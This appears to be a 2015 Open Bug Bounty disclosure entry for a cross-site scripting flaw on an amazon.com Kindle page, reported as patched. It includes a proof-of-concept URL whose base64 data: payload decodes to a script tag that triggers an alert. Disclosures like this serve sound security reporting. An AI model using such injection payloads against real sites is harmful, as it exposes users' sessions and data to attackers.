amazon.com XSS vulnerability

2015-04-09T22:37:00
ID OBB:57850
Type openbugbounty
Reporter MLT
Modified 2015-04-09T22:39:00

Description

Vulnerable URL:
http://www.amazon.com/gp/kindle/kcpApp.html?ref=appleDirectW1&url;=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==#
Details:

Description| Value
---|---
Patched:| Yes, at 11.04.2015
Latest check for patch:| 11.04.2015 11:22 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 7
Google Pagerank| 0
VIP website status:| Yes
Check amazon.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 9 April, 2015 22:37 GMT
Vulnerability existence verified and confirmed| 9 April, 2015 22:39 GMT